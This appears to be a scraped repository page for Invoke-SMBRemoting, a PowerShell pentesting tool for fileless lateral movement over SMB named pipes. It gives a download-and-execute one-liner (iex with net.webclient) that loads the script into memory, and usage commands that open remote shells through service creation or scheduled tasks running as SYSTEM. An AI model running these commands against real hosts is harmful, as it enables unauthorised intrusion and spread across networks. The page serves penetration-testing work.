Invoke SMBRemoting
Interactive Shell and Command Execution over Named-Pipes (SMB) for Fileless lateral movement
Interactive Shell and Command Execution over Named-Pipes (SMB) for Fileless lateral movement. The project is written primarily in PowerShell, distributed under the GNU General Public License v3.0 license, first published in 2023. Key topics include: command-execution, fileless, lateral-movement, named-pipes, pentesting-tools.
Invoke-SMBRemoting
Interactive Shell and Command Execution over Named-Pipes (SMB) for Fileless lateral movement.
Invoke-SMBRemoting enables remote command execution or interactive shell access over SMB named pipes through service creation/modification or scheduled tasks.
The tool supports specifying commands or establishing a persistent shell connection, and requires administrative rights on the target.
First, load the script in memory:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SMBRemoting/main/Invoke-SMBRemoting.ps1')
Interactive Shell
Invoke-SMBRemoting -ComputerName "Workstation-01.ferrari.local"
Invoke-SMBRemoting -ComputerName "Workstation-01.ferrari.local" -PipeName Something -ServiceName RandomService
Invoke-SMBRemoting -ComputerName "Workstation-01.ferrari.local" -ModifyService -Verbose
Invoke-SMBRemoting -ComputerName "Workstation-01.ferrari.local" -ModifyService -ServiceName SensorService -Verbose
Command Execution
Invoke-SMBRemoting -ComputerName "Workstation-01.ferrari.local" -Command "whoami /all"
Invoke-SMBRemoting -ComputerName "Workstation-01.ferrari.local" -Command "whoami /all" -PipeName Something -ServiceName RandomService
Invoke-SMBRemoting -ComputerName "Workstation-01.ferrari.local" -Command "whoami /all" -ModifyService
Invoke-SMBRemoting -ComputerName "Workstation-01.ferrari.local" -Command "whoami /all" -ModifyService -ServiceName SensorService -Verbose
Scheduled Tasks
Invoke-SMBRemoting can now leverage Scheduled Tasks to enable command execution or interactive shell access over Named Pipes (SMB) on a remote host.
On the remote host, created tasks will run as SYSTEM by default, but you can run them in the current user context by using the -AsUser switch
Invoke-SMBRemoting -ComputerName MSSQL01.ferrari.local -AsTask
Invoke-SMBRemoting -ComputerName MSSQL01.ferrari.local -AsTask -Command "whoami /all"
Invoke-SMBRemoting -ComputerName MSSQL01.ferrari.local -AsTask -AsUser
Invoke-SMBRemoting -ComputerName MSSQL01.ferrari.local -AsTask -AsUser -Command "whoami /all"
Contributors
Showing top 2 contributors by commit count.
Related Repositories
bkbilly/lnxlink
🖥 Effortlessly manage your Linux machine using MQTT.
OWASP/Vulnerable-Web-Application
OWASP Vulnerable Web Application Project https://github.com/hummingbirdscyber
mez-0/CSharpWinRM
.NET 4.0 WinRM API Command Execution
xolox/python-executor
Programmer friendly subprocess wrapper
palantir/giraffe
Gracefully Integrated Remote Access For Files and Execution
firnsan/shell-agent
Agent program installed on remote host, help you to execute shell command on the remote host via HTTP. Also help to transport file to/from remote host.